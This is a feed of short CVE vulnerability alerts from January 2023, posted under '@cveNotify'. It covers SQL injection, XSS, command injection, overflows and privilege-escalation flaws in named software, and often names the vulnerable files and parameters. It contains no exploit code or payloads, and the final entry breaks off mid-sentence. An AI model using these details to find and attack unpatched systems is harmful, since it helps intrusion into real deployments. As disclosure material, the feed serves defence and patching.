| 2023-01-29 20:29:39 |
🚨 CVE-2023-0569Weak Password Requirements in GitHub repository publify/publify prior to 9.2.10.🎖@cveNotify |
|
| 2023-01-29 15:29:39 |
🚨 CVE-2021-23450All versions of package dojo are vulnerable to Prototype Pollution via the setObject function.🎖@cveNotify |
|
| 2023-01-29 15:29:38 |
🚨 CVE-2020-4051In Dijit before versions 1.11.11, and greater than or equal to 1.12.0 and less than 1.12.9, and greater than or equal to 1.13.0 and less than 1.13.8, and greater than or equal to 1.14.0 and less than 1.14.7, and greater than or equal to 1.15.0 and less than 1.15.4, and greater than or equal to 1.16.0 and less than 1.16.3, there is a cross-site scripting vulnerability in the Editor's LinkDialog plugin. This has been fixed in 1.11.11, 1.12.9, 1.13.8, 1.14.7, 1.15.4, 1.16.3.🎖@cveNotify |
|
| 2023-01-29 12:29:38 |
🚨 CVE-2023-0562A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219716.🎖@cveNotify |
|
| 2023-01-29 07:29:40 |
🚨 CVE-2022-48285loadAsync in JSZip before 3.8.0 allows Directory Traversal via a crafted ZIP archive.🎖@cveNotify |
|
| 2023-01-29 07:29:39 |
🚨 CVE-2022-24765Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-gitare vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.🎖@cveNotify |
|
| 2023-01-29 07:29:38 |
🚨 CVE-2023-0564Weak Password Requirements in GitHub repository froxlor/froxlor prior to 2.0.10.🎖@cveNotify |
|
| 2023-01-29 02:29:44 |
🚨 CVE-2022-32221When doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously was used to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent `POST` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.🎖@cveNotify |
|
| 2023-01-29 02:29:40 |
🚨 CVE-2022-35252When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a"sister site" to deny service to all siblings.🎖@cveNotify |
|
| 2023-01-29 02:29:39 |
🚨 CVE-2021-4315A vulnerability has been found in NYUCCL psiTurk up to 3.2.0 and classified as critical. This vulnerability affects unknown code of the file psiturk/experiment.py. The manipulation of the argument mode leads to improper neutralization of special elements used in a template engine. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.1 is able to address this issue. The name of the patch is 47787e15cecd66f2aa87687bf852ae0194a4335f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-219676.🎖@cveNotify |
|
| 2023-01-29 02:29:38 |
🚨 CVE-2023-0562A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-219716.🎖@cveNotify |
|
| 2023-01-29 02:29:37 |
🚨 CVE-2023-0563A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219717 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-28 20:29:38 |
🚨 CVE-2020-16093In LemonLDAP::NG (aka lemonldap-ng) through 2.0.8, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used.🎖@cveNotify |
|
| 2023-01-28 20:29:37 |
🚨 CVE-2023-0561A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file /user/s.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-219702 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-28 15:29:39 |
🚨 CVE-2020-36658In Apache::Session::LDAP before 0.5, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used. NOTE: this can, for example, be fixed in conjunction with the CVE-2020-16093 fix.🎖@cveNotify |
|
| 2023-01-28 15:29:38 |
🚨 CVE-2020-36659In Apache::Session::Browseable before 1.3.6, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used. NOTE: this can, for example, be fixed in conjunction with the CVE-2020-16093 fix.🎖@cveNotify |
|
| 2023-01-28 07:29:59 |
🚨 CVE-2023-0101A privilege escalation vulnerability was identified in Nessus versions 8.10.1 through 8.15.8 and 10.0.0 through 10.4.1. An authenticated attacker could potentially execute a specially crafted file to obtain root or NT AUTHORITY / SYSTEM privileges on the Nessus host.🎖@cveNotify |
|
| 2023-01-28 07:29:58 |
🚨 CVE-2023-23012Cross Site Scripting (XSS) vulnerability in craigrodway classroombookings 2.6.4 allows attackers to execute arbitrary code or other unspecified impacts via the input bgcol in file Weeks.php.🎖@cveNotify |
|
| 2023-01-28 07:29:56 |
🚨 CVE-2022-47015MariaDB Server before 10.3.34 thru 10.9.3 is vulnerable to Denial of Service. It is possible for function spider_db_mbase::print_warnings to dereference a null pointer.🎖@cveNotify |
|
| 2023-01-28 07:29:55 |
🚨 CVE-2022-42409This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. Crafted data in a PDF file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18315.🎖@cveNotify |
|
| 2023-01-28 07:29:54 |
🚨 CVE-2022-42410This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PGM files. Crafted data in a PGM file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18365.🎖@cveNotify |
|
| 2023-01-28 07:29:53 |
🚨 CVE-2022-47012Use of uninitialized variable in function gen_eth_recv in GNS3 dynamips 0.2.21.🎖@cveNotify |
|
| 2023-01-28 07:29:52 |
🚨 CVE-2022-45748An issue was discovered with assimp 5.1.4, a use after free occurred in function ColladaParser::ExtractDataObjectFromChannel in file /code/AssetLib/Collada/ColladaParser.cpp.🎖@cveNotify |
|
| 2023-01-28 07:29:51 |
🚨 CVE-2023-0164OrangeScrum version 2.0.11 allows an authenticated external attacker to execute arbitrary commands on the server. This is possible because the application injects an attacker-controlled parameter into a system function.🎖@cveNotify |
|
| 2023-01-28 07:29:50 |
🚨 CVE-2023-23010Cross Site Scripting (XSS) vulnerability in Ecommerce-CodeIgniter-Bootstrap thru commit d5904379ca55014c5df34c67deda982c73dc7fe5 (on Dec 27, 2022), allows attackers to execute arbitrary code via the languages and trans_load parameters in file add_product.php.🎖@cveNotify |
|
| 2023-01-28 07:29:48 |
🚨 CVE-2023-23014Cross Site Scripting (XSS) vulnerability in InventorySystem thru commit e08fbbe17902146313501ed0b5feba81d58f455c (on Apr 23, 2021) via edit_store_name and edit_active inputs in file InventorySystem.php.🎖@cveNotify |
|
| 2023-01-28 07:29:47 |
🚨 CVE-2019-19740Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable.🎖@cveNotify |
|
| 2023-01-28 07:29:46 |
🚨 CVE-2019-10695When using the cd4pe::root_configuration task to configure a Continuous Delivery for PE installation, the root user’s username and password were exposed in the job’s Job Details pane in the PE console. These issues have been resolved in version 1.2.1 of the puppetlabs/cd4pe module.🎖@cveNotify |
|
| 2023-01-28 07:29:45 |
🚨 CVE-2019-11165Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-01-28 07:29:44 |
🚨 CVE-2020-14947OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.🎖@cveNotify |
|
| 2023-01-28 07:29:43 |
🚨 CVE-2020-24371lgc.c in Lua 5.4.0 mishandles the interaction between barriers and the sweep phase, leading to a memory access violation involving collectgarbage.🎖@cveNotify |
|
| 2023-01-28 07:29:42 |
🚨 CVE-2020-13151Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service.🎖@cveNotify |
|
| 2023-01-28 07:29:41 |
🚨 CVE-2023-23628Metabase is an open source data analytics platform. Affected versions are subject to Exposure of Sensitive Information to an Unauthorized Actor. Sandboxed users shouldn't be able to view data about other Metabase users anywhere in the Metabase application. However, when a sandbox user views the settings for a dashboard subscription, and another user has added users to that subscription, the sandboxed user is able to view the list of recipients for that subscription. This issue is patched in versions 0.43.7.1, 1.43.7.1, 0.44.6.1, 1.44.6.1, 0.45.2.1, and 1.45.2.1. There are no workarounds.🎖@cveNotify |
|
| 2023-01-28 07:29:39 |
🚨 CVE-2023-23629Metabase is an open source data analytics platform. Affected versions are subject to Improper Privilege Management. As intended, recipients of dashboards subscriptions can view the data as seen by the creator of that subscription. This allows someone with greater access to data to create a dashboard subscription, add people with fewer data privileges, and all recipients of that subscription receive the same data: the charts shown in the email would abide by the privileges of the user who created the subscription. The issue is users with fewer privileges who can view a dashboard are able to add themselves to a dashboard subscription created by someone with additional data privileges, and thus get access to more data via email. This issue is patched in versions 0.43.7.1, 1.43.7.1, 0.44.6.1, 1.44.6.1, 0.45.2.1, and 1.45.2.1. On Metabase instances running Enterprise Edition, admins can disable the "Subscriptions and Alerts" permission for groups that have restricted data permissions, as a workaround.🎖@cveNotify |
|
| 2023-01-28 07:29:38 |
🚨 CVE-2020-15904A buffer overflow in the patching routine of bsdiff4 before 1.2.0 allows an attacker to write to heap memory (beyond allocated bounds) via a crafted patch file.🎖@cveNotify |
|
| 2023-01-28 07:29:37 |
🚨 CVE-2020-14929Alpine before 2.23 silently proceeds to use an insecure connection after a /tls is sent in certain circumstances involving PREAUTH, which is a less secure behavior than the alternative of closing the connection and letting the user decide what they would like to do.🎖@cveNotify |
|
| 2023-01-27 19:29:58 |
🚨 CVE-2020-11019In FreeRDP less than or equal to 2.0.0, when running with logger set to "WLOG_TRACE", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0.🎖@cveNotify |
|
| 2023-01-27 19:29:57 |
🚨 CVE-2020-11018In FreeRDP less than or equal to 2.0.0, a possible resource exhaustion vulnerability can be performed. Malicious clients could trigger out of bound reads causing memory allocation with random size. This has been fixed in 2.1.0.🎖@cveNotify |
|
| 2023-01-27 19:29:55 |
🚨 CVE-2020-13112An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093.🎖@cveNotify |
|
| 2023-01-27 19:29:54 |
🚨 CVE-2018-6693An unprivileged user can delete arbitrary files on a Linux system running ENSLTP 10.5.1, 10.5.0, and 10.2.3 Hotfix 1246778 and earlier. By exploiting a time of check to time of use (TOCTOU) race condition during a specific scanning sequence, the unprivileged user is able to perform a privilege escalation to delete arbitrary files.🎖@cveNotify |
|
| 2023-01-27 19:29:52 |
🚨 CVE-2020-12823OpenConnect 8.09 has a buffer overflow, causing a denial of service (application crash) or possibly unspecified other impact, via crafted certificate data to get_cert_name in gnutls.c.🎖@cveNotify |
|
| 2023-01-27 19:29:51 |
🚨 CVE-2020-12767exif_entry_get_value in exif-entry.c in libexif 0.6.21 has a divide-by-zero error.🎖@cveNotify |
|
| 2023-01-27 19:29:50 |
🚨 CVE-2020-12267setMarkdown in Qt before 5.14.2 has a use-after-free related to QTextMarkdownImporter::insertBlock.🎖@cveNotify |
|
| 2023-01-27 19:29:49 |
🚨 CVE-2020-1983A use after free vulnerability in ip_reass() in ip_input.c of libslirp 4.2.0 and prior releases allows crafted packets to cause a denial of service.🎖@cveNotify |
|
| 2023-01-27 19:29:48 |
🚨 CVE-2020-11958re2c 1.3 has a heap-based buffer overflow in Scanner::fill in parse/scanner.cc via a long lexeme.🎖@cveNotify |
|
| 2023-01-27 19:29:47 |
🚨 CVE-2018-6686Authentication Bypass vulnerability in TPM autoboot in McAfee Drive Encryption (MDE) 7.1.0 and above allows physically proximate attackers to bypass local security protection via specific set of circumstances.🎖@cveNotify |
|
| 2023-01-27 19:29:46 |
🚨 CVE-2018-6590CA API Developer Portal 4.x, prior to v4.2.5.3 and v4.2.7.1, has an unspecified reflected cross-site scripting vulnerability.🎖@cveNotify |
|
| 2023-01-27 19:29:45 |
🚨 CVE-2018-6677Directory Traversal vulnerability in the administrative user interface in McAfee Web Gateway (MWG) MWG 7.8.1.x allows authenticated administrator users to gain elevated privileges via unspecified vectors.🎖@cveNotify |
|
| 2023-01-27 19:29:44 |
🚨 CVE-2018-6692Stack-based Buffer Overflow vulnerability in libUPnPHndlr.so in Belkin Wemo Insight Smart Plug allows remote attackers to bypass local security protection via a crafted HTTP post packet.🎖@cveNotify |
|
| 2023-01-27 19:29:43 |
🚨 CVE-2020-1751An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-01-27 19:29:42 |
🚨 CVE-2020-1943Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.🎖@cveNotify |
|
| 2023-01-27 19:29:41 |
🚨 CVE-2019-17560The "Apache NetBeans" autoupdate system does not validate SSL certificates and hostnames for https based downloads. This allows an attacker to intercept downloads of autoupdates and modify the download, potentially injecting malicious code. “Apache NetBeans" versions up to and including 11.2 are affected by this vulnerability.🎖@cveNotify |
|
| 2023-01-27 19:29:40 |
🚨 CVE-2020-8552The Kubernetes API server component in versions prior to 1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via successful API requests.🎖@cveNotify |
|
| 2023-01-27 19:29:39 |
🚨 CVE-2018-6706Insecure handling of temporary files in non-Windows McAfee Agent 5.0.0 through 5.0.6, 5.5.0, and 5.5.1 allows an Unprivileged User to introduce custom paths during agent installation in Linux via unspecified vectors.🎖@cveNotify |
|
| 2023-01-27 19:29:38 |
🚨 CVE-2018-6687Loop with Unreachable Exit Condition ('Infinite Loop') in McAfee GetSusp (GetSusp) 3.0.0.461 and earlier allows attackers to DoS a manual GetSusp scan via while scanning a specifically crafted file . GetSusp is a free standalone McAfee tool that runs on several versions of Microsoft Windows.🎖@cveNotify |
|
| 2023-01-27 17:29:56 |
🚨 CVE-2020-14980The Sophos Secure Email application through 3.9.4 for Android has Missing SSL Certificate Validation.🎖@cveNotify |
|
| 2023-01-27 17:29:52 |
🚨 CVE-2021-37774An issue was discovered in function httpProcDataSrv in TL-WDR7660 2.0.30 that allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-27 17:29:51 |
🚨 CVE-2019-18180Improper Check for filenames with overly long extensions in PostMaster (sending in email) or uploading files (e.g. attaching files to mails) of ((OTRS)) Community Edition and OTRS allows an remote attacker to cause an endless loop. This issue affects: OTRS AG: ((OTRS)) Community Edition 5.0.x version 5.0.38 and prior versions; 6.0.x version 6.0.23 and prior versions. OTRS AG: OTRS 7.0.x version 7.0.12 and prior versions.🎖@cveNotify |
|
| 2023-01-27 17:29:50 |
🚨 CVE-2023-0385The Custom 404 Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.7.1. This is due to missing or incorrect nonce validation on the custom_404_pro_admin_init function. This makes it possible for unauthenticated attackers to delete logs, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-01-27 17:29:49 |
🚨 CVE-2020-7040storeBackup.pl in storeBackup through 3.5 relies on the /tmp/storeBackup.lock pathname, which allows symlink attacks that possibly lead to privilege escalation. (Local users can also create a plain file named /tmp/storeBackup.lock to block use of storeBackup until an admin manually deletes that file.)🎖@cveNotify |
|
| 2023-01-27 16:30:01 |
🚨 CVE-2022-44298SiteServer CMS 7.1.3 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-01-27 16:30:00 |
🚨 CVE-2022-44715Improper File Permissions in NetScout nGeniusONE 6.3.2 build 904 allows authenticated remote users to gain permissions via a crafted payload.🎖@cveNotify |
|
| 2023-01-27 16:29:59 |
🚨 CVE-2022-44717An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 1 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is High. Privileges required are administrator, User Interaction is required, and Scope is unchanged. The user must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host.🎖@cveNotify |
|
| 2023-01-27 16:29:58 |
🚨 CVE-2022-44718An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 2 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is High. Privileges required are administrator, User Interaction is required, and Scope is unchanged. The user must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host.🎖@cveNotify |
|
| 2023-01-27 16:29:57 |
🚨 CVE-2022-47024A null pointer dereference issue was discovered in function gui_x11_create_blank_mouse in gui_x11.c in vim 8.1.2269 thru 9.0.0339 allows attackers to cause denial of service or other unspecified impacts.🎖@cveNotify |
|
| 2023-01-27 16:29:56 |
🚨 CVE-2022-47021A null pointer dereference issue was discovered in functions op_get_data and op_open1 in opusfile.c in xiph opusfile 0.9 thru 0.12 allows attackers to cause denial of service or other unspecified impacts.🎖@cveNotify |
|
| 2023-01-27 16:29:55 |
🚨 CVE-2023-0398Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4.🎖@cveNotify |
|
| 2023-01-27 16:29:54 |
🚨 CVE-2021-37499CRLF vulnerability in Reprise License Manager (RLM) web interface through 14.2BL4 in the password parameter in View License Result function, that allows remote attackers to inject arbitrary HTTP headers.🎖@cveNotify |
|
| 2023-01-27 16:29:52 |
🚨 CVE-2022-47016A null pointer dereference issue was discovered in function window_pane_set_event in window.c in tmux 3.0 thru 3.3 and later, allows attackers to cause denial of service or other unspecified impacts.🎖@cveNotify |
|
| 2023-01-27 16:29:51 |
🚨 CVE-2023-24028In MISP 2.4.167, app/Controller/Component/ACLComponent.php has incorrect access control for the decaying import function.🎖@cveNotify |
|
| 2023-01-27 16:29:47 |
🚨 CVE-2021-37498An SSRF issue was discovered in Reprise License Manager (RLM) web interface through 14.2BL4 that allows remote attackers to trigger outbound requests to intranet servers, conduct port scans via the actserver parameter in License Activation function.🎖@cveNotify |
|
| 2023-01-27 16:29:46 |
🚨 CVE-2022-40843The Tenda AC1200 V-W15Ev2 V15.11.0.10(1576) router is vulnerable to improper authorization / improper session management that allows the router login page to be bypassed. This leads to authenticated attackers having the ability to read the routers syslog.log file which contains the MD5 password of the Administrator's user account.🎖@cveNotify |
|
| 2023-01-27 16:29:45 |
🚨 CVE-2022-40845The Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576) is affected by a password exposure vulnerability. When combined with the improper authorization/improper session management vulnerability, an attacker with access to the router may be able to expose sensitive information which they're not explicitly authorized to have.🎖@cveNotify |
|
| 2023-01-27 16:29:44 |
🚨 CVE-2022-40847In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), there exists a command injection vulnerability in the function formSetFixTools. This vulnerability allows attackers to run arbitrary commands on the server via the hostname parameter.🎖@cveNotify |
|
| 2023-01-27 16:29:43 |
🚨 CVE-2022-40844In Tenda (Shenzhen Tenda Technology Co., Ltd) AC1200 Router model W15Ev2 V15.11.0.10(1576), a Stored Cross Site Scripting (XSS) issue exists allowing an attacker to execute JavaScript code via the applications website filtering tab, specifically the URL body.🎖@cveNotify |
|
| 2023-01-27 16:29:39 |
🚨 CVE-2022-40846In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), a Stored Cross Site Scripting (XSS) vulnerability exists allowing an attacker to execute JavaScript code via the applications stored hostname.🎖@cveNotify |
|
| 2023-01-27 16:29:38 |
🚨 CVE-2021-39089IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.6.0 could allow an authenticated user to obtain sensitive information from a specially crafted HTTP request. IBM X-Force ID: 216387.🎖@cveNotify |
|
| 2023-01-27 16:29:37 |
🚨 CVE-2021-39011IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.6.0 stores potentially sensitive information in log files that could be read by a privileged user. IBM X-Force ID: 213645.🎖@cveNotify |
|
| 2023-01-27 16:29:36 |
🚨 CVE-2022-39167IBM Spectrum Virtualize 8.5, 8.4, 8.3, 8.2, and 7.8, under certain configurations, could disclose sensitive information to an attacker using man-in-the-middle techniques. IBM X-Force ID: 235408.🎖@cveNotify |
|
| 2023-01-27 14:29:56 |
🚨 CVE-2023-0528A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been classified as critical. This affects an unknown part of the file admin/abc.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219597 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-27 14:29:55 |
🚨 CVE-2023-0529A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/add_payment.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-219598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-27 14:29:53 |
🚨 CVE-2023-0530A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/approve_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219599.🎖@cveNotify |
|
| 2023-01-27 14:29:52 |
🚨 CVE-2023-0531A vulnerability classified as critical has been found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file admin/booking_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219600.🎖@cveNotify |
|
| 2023-01-27 14:29:50 |
🚨 CVE-2023-0532A vulnerability classified as critical was found in SourceCodester Online Tours & Travels Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/disapprove_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219601 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-27 14:29:49 |
🚨 CVE-2023-0533A vulnerability, which was classified as critical, has been found in SourceCodester Online Tours & Travels Management System 1.0. Affected by this issue is some unknown functionality of the file admin/expense_report.php. The manipulation of the argument from_date leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-219602 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-27 14:29:48 |
🚨 CVE-2023-0534A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file admin/expense_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219603.🎖@cveNotify |
|
| 2023-01-27 14:29:46 |
🚨 CVE-2022-47927An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. When installing with a pre-existing data directory that has weak permissions, the SQLite files are created with file mode 0644, i.e., world readable to local users. These files include credentials data.🎖@cveNotify |
|
| 2023-01-27 14:29:45 |
🚨 CVE-2023-22945In the GrowthExperiments extension for MediaWiki through 1.39, the growthmanagementorlist API allows blocked users (blocked in ApiManageMentorList) to enroll as mentors or edit any of their mentorship-related properties.🎖@cveNotify |
|
| 2023-01-27 14:29:44 |
🚨 CVE-2023-22909An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. SpecialMobileHistory allows remote attackers to cause a denial of service because database queries are slow.🎖@cveNotify |
|
| 2023-01-27 14:29:42 |
🚨 CVE-2023-22911An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. E-Widgets does widget replacement in HTML attributes, which can lead to XSS, because widget authors often do not expect that their widget is executed in an HTML attribute context.🎖@cveNotify |
|
| 2023-01-27 14:29:41 |
🚨 CVE-2022-29187Git is a distributed revision control system. Git prior to versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is vulnerable to privilege escalation in all platforms. An unsuspecting user could still be affected by the issue reported in CVE-2022-24765, for example when navigating as root into a shared tmp directory that is owned by them, but where an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The simplest way to avoid being affected by the exploit described in the example is to avoid running git as root (or an Administrator in Windows), and if needed to reduce its use to a minimum. While a generic workaround is not possible, a system could be hardened from the exploit described in the example by removing any such repository if it exists already and creating one as root to block any future attacks.🎖@cveNotify |
|
| 2023-01-27 14:29:39 |
🚨 CVE-2022-24765Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-gitare vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.🎖@cveNotify |
|
| 2023-01-27 12:29:38 |
🚨 CVE-2022-2712In Eclipse GlassFish versions 5.1.0 to 6.2.5, there is a vulnerability in relative path traversal because it does not filter request path starting with './'. Successful exploitation could allow an remote unauthenticated attacker to access critical data, such as configuration files and deployed application source code.🎖@cveNotify |
|
| 2023-01-27 12:29:37 |
🚨 CVE-2022-40267Predictable Seed in Pseudo-Random Number Generator (PRNG) vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DSS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UJ-xMy/z (x=24,40,60, y=T,R, z=ES,ESS) versions 1.042 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UJ-xMy/ES-A (x=24,40,60, y=T,R) versions 1.043 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5S-xMy/z (x=30,40,60,80, y=T,R, z=ES,ESS) versions 1.003 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MR/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU all versions allows a remote unauthenticated attacker to access the Web server function by guessing the random numbers used for authentication from several used random 